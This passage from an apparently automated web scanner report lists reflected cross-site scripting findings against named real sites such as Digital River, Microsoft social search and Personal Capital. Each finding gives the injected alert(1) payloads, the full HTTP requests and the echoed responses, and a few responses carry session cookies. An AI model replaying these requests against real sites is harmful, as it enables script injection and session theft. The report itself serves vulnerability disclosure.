The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
The value of the c?url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bee19"><script>alert(1)</script>7e3f5c1ce7b was submitted in the c?url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c?url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93d52"-alert(1)-"3853defa198 was submitted in the c?url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the c?url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c46a'-alert(1)-'726db27dea2 was submitted in the c?url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.90. http://de17a.com/a/41565.iframe [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://de17a.com
Path:
/a/41565.iframe
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 234df"><script>alert(1)</script>365dc5ee018 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.91. http://de17a.com/a/41565.iframe [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://de17a.com
Path:
/a/41565.iframe
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af784'-alert(1)-'d1d4270fbfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.92. http://de17a.com/a/41565.iframe [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://de17a.com
Path:
/a/41565.iframe
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a472b"-alert(1)-"0b25fc585f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e0ab'-alert(1)-'5a57fb80789 was submitted in the aid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?aid=2448e0ab'-alert(1)-'5a57fb80789&tax=microsoft HTTP/1.1 Host: display.digitalriver.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.microsoftstore.com/store/msstore/home?WT.mc_id=MSCOM_DLC_US_BL_BuyMS
Response
HTTP/1.1 200 OK Date: Thu, 04 Aug 2011 02:29:59 GMT Server: Apache/2.2.9 Expires: Thu, 04 Aug 2011 02:59:59 GMT Last-Modified: Thu, 04 Aug 2011 02:29:59 GMT Content-Length: 232 Connection: close Content-Type: text/html
var dgt_script = document.createElement('SCRIPT'); dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=2448e0ab'-alert(1)-'5a57fb80789&tax=microsoft'; document.getElementsByTagName('head')[0].appendChild(dgt_script);
2.94. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://display.digitalriver.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20f02'-alert(1)-'8212d8e5b54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?aid=244&tax=microsoft&20f02'-alert(1)-'8212d8e5b54=1 HTTP/1.1 Host: display.digitalriver.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.microsoftstore.com/store/msstore/home?WT.mc_id=MSCOM_DLC_US_BL_BuyMS
Response
HTTP/1.1 200 OK Date: Thu, 04 Aug 2011 02:30:00 GMT Server: Apache/2.2.9 Expires: Thu, 04 Aug 2011 03:00:00 GMT Last-Modified: Thu, 04 Aug 2011 02:30:00 GMT Content-Length: 235 Connection: close Content-Type: text/html
var dgt_script = document.createElement('SCRIPT'); dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=microsoft&20f02'-alert(1)-'8212d8e5b54=1'; document.getElementsByTagName('head')[0].appendChild(dgt_script);
The value of the tax request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20c10'-alert(1)-'d3cdeb66c64 was submitted in the tax parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?aid=244&tax=microsoft20c10'-alert(1)-'d3cdeb66c64 HTTP/1.1 Host: display.digitalriver.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.microsoftstore.com/store/msstore/home?WT.mc_id=MSCOM_DLC_US_BL_BuyMS
Response
HTTP/1.1 200 OK Date: Thu, 04 Aug 2011 02:30:00 GMT Server: Apache/2.2.9 Expires: Thu, 04 Aug 2011 03:00:00 GMT Last-Modified: Thu, 04 Aug 2011 02:30:00 GMT Content-Length: 232 Connection: close Content-Type: text/html
var dgt_script = document.createElement('SCRIPT'); dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=microsoft20c10'-alert(1)-'d3cdeb66c64'; document.getElementsByTagName('head')[0].appendChild(dgt_script);
The value of the CategoryID request parameter is copied into the HTML document as plain text between tags. The payload 5b2e2<script>alert(1)</script>c59e91a205d was submitted in the CategoryID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /store?SiteID=msstore&Locale=en_US&Action=DisplayDRProductInfo&CategoryID=383363005b2e2<script>alert(1)</script>c59e91a205d&size=1000&version=2&output=json&content=displayName+msSearchRank+msImage_S&orderBy=msSearchRank+descending&catalog=false&jsonp=dr.autocomplete.initialize HTTP/1.1 Host: dri1.img.digitalrivercontent.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.microsoftstore.com/store/msstore/home?WT.mc_id=MSCOM_DLC_US_BL_BuyMS
Response
HTTP/1.1 200 OK Content-Length: 374397 Content-Type: text/javascript;charset=UTF-8 Last-Modified: Thu, 04 Aug 2011 02:36:16 GMT Server: Microsoft-IIS/7.5 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: private Access-Control-Allow-Origin: * X-Powered-By: ASP.NET P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC" Cache-Control: max-age=86400 Expires: Fri, 05 Aug 2011 02:36:37 GMT Date: Thu, 04 Aug 2011 02:36:37 GMT Connection: close
/* Digital River ProductInfo Widget */ /* JSON Output */
dr.autocomplete.initialize({"productInfo":{"categoryID":"383363005b2e2<script>alert(1)</script>c59e91a205d","startIndex":0,"size":1000,"totalSize":1005,"product":[{"productID":216507400,"displayName":"Kinect for Xbox 360","msSearchRank":9,"msImage_S":"hardware/cart/en-US_Xbox360_Kinect_Sensor_LPF-00004.jpg ...[SNIP]...
The value of the output request parameter is copied into a JavaScript inline comment. The payload 13c27*/alert(1)//b6adf105f78 was submitted in the output parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /store?SiteID=msstore&Locale=en_US&Action=DisplayDRProductInfo&CategoryID=38336300&size=1000&version=2&output=json13c27*/alert(1)//b6adf105f78&content=displayName+msSearchRank+msImage_S&orderBy=msSearchRank+descending&catalog=false&jsonp=dr.autocomplete.initialize HTTP/1.1 Host: dri1.img.digitalrivercontent.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.microsoftstore.com/store/msstore/home?WT.mc_id=MSCOM_DLC_US_BL_BuyMS
Response
HTTP/1.1 200 OK Content-Length: 261643 Content-Type: text/javascript;charset=UTF-8 Last-Modified: Thu, 04 Aug 2011 02:36:51 GMT Server: Microsoft-IIS/7.5 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: private X-Powered-By: ASP.NET P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC" Cache-Control: max-age=86400 Expires: Fri, 05 Aug 2011 02:36:59 GMT Date: Thu, 04 Aug 2011 02:36:59 GMT Connection: close
The value of the INIT request parameter is copied into the XML document as plain text between tags. The payload a444c<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>c44e3c3b82c was submitted in the INIT parameter. This input was echoed as a444c<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>c44e3c3b82c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
The value of the flashINIT request parameter is copied into the XML document as plain text between tags. The payload 40c6b<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>a213b663f58 was submitted in the flashINIT parameter. This input was echoed as 40c6b<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>a213b663f58 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 50b07<script>alert(1)</script>d134b251f59 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/track?application_id=081c924b-ddfd-447a-8c7a-2db01211cae7&url_fbid=Zr7DxOZ9tRO&parent_fbid=&referrer=&location=http%3A%2F%2Fwww.discoverbing.com%2F&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B50b07<script>alert(1)</script>d134b251f59 HTTP/1.1 Host: frontend-loadbalancer.meteorsolutions.com Proxy-Connection: keep-alive Referer: http://www.discoverbing.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/javascript Date: Tue, 02 Aug 2011 18:34:40 GMT Etag: "7466ea447b7cc0bebd03d2ab15e689727215ee63" P3P: CP="NID DSP ALL COR" Server: nginx/0.7.65 Set-Cookie: meteor_server_081c924b-ddfd-447a-8c7a-2db01211cae7=081c924b-ddfd-447a-8c7a-2db01211cae7%3C%3EZr7DxOZ9tRO%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.discoverbing.com%2F; Domain=.meteorsolutions.com; expires=Wed, 01 Aug 2012 18:34:40 GMT; Path=/ Set-Cookie: uid=c24daa55-d689-43c1-bfdf-08ee61c39dda; Domain=.meteorsolutions.com; expires=Wed, 01 Aug 2012 18:34:40 GMT; Path=/ Content-Length: 174 Connection: keep-alive
The value of the challengeReason request parameter is copied into the HTML document as plain text between tags. The payload 82a53<script>alert(1)</script>c9d82fda620 was submitted in the challengeReason parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the username request parameter is copied into the HTML document as plain text between tags. The payload c31db<script>alert(1)</script>b73e69cbf43 was submitted in the username parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the email request parameter is copied into the HTML document as plain text between tags. The payload edf33<script>alert(1)</script>4b930307c05 was submitted in the email parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Tue, 02 Aug 2011 20:43:48 GMT cache-control: no-cache, no-store, must-revalidate, maxage=0 pragma: no-cache expires: Thu, 01 Jan 1970 00:00:00 GMT google-bot: noarchive Set-Cookie: JSESSIONID=FF4B518E092DFED295521516D66D5C61; Path=/; Secure SP_HEADERS: {"SP_HEADER_VERSION":"1312317828248","secondFactor":false,"csrf":"de8f5788-c607-47d0-a6a2-6e19b91eec62","status":"NONE","authLevel":"NONE","authenticated":false,"identified":false} Content-Type: application/json;charset=UTF-8 Content-Language: en-US Content-Length: 728 Connection: close
{"spHeader":{"SP_HEADER_VERSION":"1312317828248","secondFactor":false,"csrf":"de8f5788-c607-47d0-a6a2-6e19b91eec62","errors":[{"message":"Please use a valid email address.","details":{"originalValue":"rtfm@fastdial.netedf33<script>alert(1)</script>4b930307c05","fieldName":"email"},"code":113},{"message":"Unsupported characters entered.","details":{"originalValue":"rtfm@fastdial.netedf33<script> ...[SNIP]...
The value of the passwd request parameter is copied into the HTML document as plain text between tags. The payload 302a8<script>alert(1)</script>aa7570b5f14 was submitted in the passwd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
{"spHeader":{"SP_HEADER_VERSION":"1312317829364","secondFactor":true,"username":"rtfm@fastdial.net","errors":[{"message":"Too many characters in the input field.","details":{"originalValue":"LL123456302a8<script>alert(1)</script>aa7570b5f14","fieldName":"passwd"},"code":106}],"deviceName":"Public Device","status":"INACTIVE","developer":false,"authLevel":"SESSION_AUTHENTICATED","authenticated":true,"betaTester":false,"identified":true,"su ...[SNIP]...
The value of the termsVersion request parameter is copied into the HTML document as plain text between tags. The payload adbf7<script>alert(1)</script>439858c3c6a was submitted in the termsVersion parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the time request parameter is copied into the name of an HTML tag attribute. The payload 84a47%20style%3dx%3aexpression(alert(1))%2076d3929e13c was submitted in the time parameter. This input was echoed as 84a47 style=x:expression(alert(1)) 76d3929e13c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /examples/jsp/cal/cal2.jsp?time=1%20ns=alert(0x0010A4)%2084a47%20style%3dx%3aexpression(alert(1))%2076d3929e13c HTTP/1.1 Host: home.personalcapital.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Cookie: JSESSIONID=BA46212703D4F25C39A99E1396FB6FB1 Connection: keep-alive Proxy-Connection: keep-alive
Response
HTTP/1.1 200 OK Date: Tue, 02 Aug 2011 20:26:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1402 Connection: close
<HTML> <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding ...[SNIP]... <INPUT NAME="time" TYPE=HIDDEN VALUE=1 ns=alert(0x0010A4) 84a47 style=x:expression(alert(1)) 76d3929e13c <BR> ...[SNIP]...
The value of the time request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 28672%20style%3dx%3aexpression(alert(1))%20402ba77607c was submitted in the time parameter. This input was echoed as 28672 style=x:expression(alert(1)) 402ba77607c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /examples/jsp/cal/cal2.jsp?time=28672%20style%3dx%3aexpression(alert(1))%20402ba77607c HTTP/1.1 Host: home.personalcapital.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Cookie: JSESSIONID=BA46212703D4F25C39A99E1396FB6FB1 Connection: keep-alive Proxy-Connection: keep-alive
Response
HTTP/1.1 200 OK Date: Tue, 02 Aug 2011 20:26:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1360 Connection: close
<HTML> <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding ...[SNIP]... <INPUT NAME="time" TYPE=HIDDEN VALUE=28672 style=x:expression(alert(1)) 402ba77607c <BR> ...[SNIP]...
2.108. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://i1.services.social.microsoft.com
Path:
/search/Widgets/SearchBox.jss
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4cdb8<img%20src%3da%20onerror%3dalert(1)>8916b0dd0a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4cdb8<img src=a onerror=alert(1)>8916b0dd0a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 200 OK ntCoent-Length: 12994 Content-Type: application/x-javascript ETag: d68b8b3868d1cc3454a4ba2920a2ee94 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI Server: CO1VB37 Content-Length: 12994 Cache-Control: public, max-age=43200 Expires: Sun, 07 Aug 2011 13:23:28 GMT Date: Sun, 07 Aug 2011 01:23:28 GMT Connection: close Vary: Accept-Encoding
2.109. http://i2.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://i2.services.social.microsoft.com
Path:
/search/Widgets/SearchBox.jss
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 12673<img%20src%3da%20onerror%3dalert(1)>877390d11ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12673<img src=a onerror=alert(1)>877390d11ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 200 OK ntCoent-Length: 12973 Content-Type: application/x-javascript ETag: ed3efaf8cbef8f2ec12fb308aa577174 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI Server: CO1VB29 Content-Length: 12973 Cache-Control: public, max-age=43200 Expires: Fri, 05 Aug 2011 04:20:15 GMT Date: Thu, 04 Aug 2011 16:20:15 GMT Connection: close Vary: Accept-Encoding
2.110. http://i3.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://i3.services.social.microsoft.com
Path:
/search/Widgets/SearchBox.jss
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 62274<img%20src%3da%20onerror%3dalert(1)>e64046ddfb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62274<img src=a onerror=alert(1)>e64046ddfb0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 200 OK Content-Type: application/x-javascript ETag: 9bdeb11e4493d38cbbd74dd9e776d9c4 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI Server: CO1VB36 Vary: Accept-Encoding Cache-Control: public, max-age=43200 Expires: Thu, 04 Aug 2011 14:24:16 GMT Date: Thu, 04 Aug 2011 02:24:16 GMT Content-Length: 12967 Connection: close
2.111. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://i4.services.social.microsoft.com
Path:
/search/Widgets/SearchBox.jss
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9f2ce<img%20src%3da%20onerror%3dalert(1)>f78a009ec99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f2ce<img src=a onerror=alert(1)>f78a009ec99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 200 OK ntCoent-Length: 12994 Content-Type: application/x-javascript ETag: 5ead7fd37a00d85d48edb100f901e032 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI Server: CO1VB37 Content-Length: 12994 Cache-Control: public, max-age=43201 Expires: Fri, 05 Aug 2011 04:21:01 GMT Date: Thu, 04 Aug 2011 16:21:00 GMT Connection: close Vary: Accept-Encoding
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33ec2<script>alert(1)</script>c74053c8b26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8bc63<script>alert(1)</script>dfdbbe7ae39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b7368<a>46a3bdce52f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload ff83d<img%20src%3da%20onerror%3dalert(1)>f044ec12716 was submitted in the id parameter. This input was echoed as ff83d<img src=a onerror=alert(1)>f044ec12716 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /is/image//EB/05712487?req=imageset,json&id=147405806ff83d<img%20src%3da%20onerror%3dalert(1)>f044ec12716&_=1312290882134 HTTP/1.1 Host: images.eastbay.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.champssports.com/catalog/productdetail/model_nbr--151878/sku--05712487&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: "8968a8dad1b55c9aa38a1d1d5bdccc9d" Content-Type: text/javascript;charset=UTF-8 Content-Length: 150 Expires: Tue, 02 Aug 2011 13:20:47 GMT Date: Tue, 02 Aug 2011 13:14:47 GMT Connection: close
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfa2f"-alert(1)-"6c2c16cea06 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/16228/131652/Lumension_IWL_728x90_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D7820111112cfa2f"-alert(1)-"6c2c16cea06&mpt=7820111112&mpvc= HTTP/1.1 Host: img.mediaplex.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: en-US Connection: keep-alive Proxy-Connection: keep-alive
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36973'%3balert(1)//dba0f6a02ac was submitted in the mpck parameter. This input was echoed as 36973';alert(1)//dba0f6a02ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/16228/131652/Lumension_IWL_728x90_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D782011111236973'%3balert(1)//dba0f6a02ac&mpt=7820111112&mpvc= HTTP/1.1 Host: img.mediaplex.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: en-US Connection: keep-alive Proxy-Connection: keep-alive
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53688'%3balert(1)//72d940fd171 was submitted in the mpvc parameter. This input was echoed as 53688';alert(1)//72d940fd171 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
